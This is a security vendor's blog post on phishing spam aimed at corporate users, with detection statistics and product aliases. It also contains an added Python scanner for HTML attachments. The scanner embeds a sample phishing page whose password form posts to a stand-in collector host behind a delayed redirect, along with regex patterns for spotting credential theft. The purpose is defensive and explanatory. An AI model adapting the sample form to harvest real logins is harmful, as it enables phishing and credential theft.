Trend of Phishing Spreading Through Spam Mails

AhnLab collects dozens of phishing spam mails from several clients daily. Phishing spam mails can be divided into two major types. The first type is a fabricated e-mail from the start (e.g. one asking the recipient to reply with personal information). The second type includes the address of a phishing website in the body of the e-mail, prompting the user to open it, or includes the script file of the phishing website as an attachment. This post explains the characteristics of recent phishing attacks and the current state of damage caused by the second type, which must be blocked by security products.

When a user opens the phishing website address included in the e-mail body, or the attached HTML file, in a web browser, they are taken to a page that asks them to enter personal information such as a company account ID or password. Phishing pages of the past had many elements that could make users suspicious when compared with legitimate pages, such as poor screen content and layout. Today, however, they are built to look almost identical to legitimate websites, so it is difficult for users to realize that their information has been leaked even after they have entered it.

Such attacks have been targeting corporate users in particular. This post therefore aims to minimize the damage from them by describing the characteristics of this attack type in detail.

Current State of Damage

1) Current state of client-reported e-mails

AhnLab receives around 10 to 30 reports of malicious spam mails daily, based on one day of reports from client XXX.

2) Malware detection

To detect phishing malware, AhnLab applies detection patterns at various points. The number of cases detected in actual client environments by only the newly-applied pattern in August 2021 is as follows: more than 5,400 cases of phishing malware were reported from around 1,000 clients.

Count   PCID
5,420   949

The pattern mentioned here is limited to a comprehensive detection method that diagnoses multiple files (1:N), not a single file (1:1). This means that the count above is a minimum; if the cases detected by previously-applied patterns were included, the damage caused by phishing malware would be assumed to be far greater.

Spam Mail

1) Example of spam mail

The following is one example of the spam mails collected from client XXX during August 2021. Users who frequently receive e-mails from outside the company are likely to open such malicious websites without a second thought. There has also been a case of spam mail disguised as an e-mail about company infrastructure. Such e-mails often include the company name in the subject, sender, and body to gain trust easily, so users must stay vigilant.

Phishing Website

1) Example of phishing websites

The following is the screen users see when they open the phishing website address included in the spam mail, or run the HTML file, in a web browser. These pages commonly aim to steal the credentials of a well-known service account or of the user's company account. Many are built meticulously, from the title to the background image, so that they can be mistaken for legitimate websites. Some recent phishing websites also deliberately delay the page redirection, as if a verification process were running.
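As an added illustration (not AhnLab's code or detection logic), the following Python scan pulls HTML attachments out of a mail and flags the traits described above: a password form that posts to a host outside the sender's domain, and a timed redirect used to mimic a verification step. The sample message, hostnames and function names are constructed for this example.

```python
# Added example (not AhnLab's code): heuristic scan of a mail for the
# HTML-attachment phishing traits the post describes. Sample mail and hosts are constructed.
import email
import re
from email import policy

SAMPLE_EML = b"""From: it-support@example-corp.test
Subject: [example-corp] Mailbox storage notice
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="verify.html"

<html><head><title>example-corp - Sign in</title></head><body>
<form method="post" action="https://collector.invalid/x.php">
<input name="email"><input type="password" name="pass"></form>
<script>setTimeout(function(){location.href="https://example-corp.test";},3000);</script>
</body></html>
--b1--
"""

PASSWORD_INPUT = re.compile(r'<input[^>]*type\s*=\s*["\']?password', re.I)
FORM_ACTION = re.compile(r'<form[^>]*action\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)
DELAYED_REDIRECT = re.compile(r'http-equiv\s*=\s*["\']?refresh|setTimeout\s*\(.{0,100}?location', re.I | re.S)

def scan_html(html: str, sender_domain: str) -> list:
    """Return the phishing indicators found in one HTML document."""
    findings = []
    if PASSWORD_INPUT.search(html):
        findings.append("password-field")
    for action in FORM_ACTION.findall(html):
        host = action.split("/")[2].lower()  # credentials leave for this host
        if not (host == sender_domain or host.endswith("." + sender_domain)):
            findings.append("form-posts-external:" + host)
    if DELAYED_REDIRECT.search(html):  # meta refresh or timed JS redirect
        findings.append("delayed-redirect")
    return findings

def scan_mail(raw: bytes) -> dict:
    """Map each HTML attachment's filename to the indicators found in it."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    sender_domain = msg["From"].split("@")[-1].strip("> ").lower()
    report = {}
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if part.get_content_type() == "text/html" or name.endswith((".htm", ".html")):
            report[name] = scan_html(part.get_content(), sender_domain)
    return report
```

A mail whose HTML attachment shows all three indicators is a strong candidate for quarantine; a single indicator warrants review rather than an automatic block.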

AhnLab’s Response

Phishing script files and connections to phishing websites are the targets for blocking. AhnLab’s products use the aliases below; only a few are listed, as they are continuously updated.

Phishing/HTML.Generic.S1644 (2021.08.25.02)
Phishing/HTML.Generic.S1643 (2021.08.25.02)
Phishing/HTML.Generic.S1642 (2021.08.25.02)
Phishing/HTML.Generic.S1641 (2021.08.25.02)
Phishing/HTML.FakeExcel.S1632 (2021.08.23.02)
Phishing/HTML.FakeExcel.S1630 (2021.08.19.02)
Phishing/HTML.Redirect.S1621 (2021.08.13.02)
Phishing/HTML.Redirect.S1620 (2021.08.13.02)

IoC


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
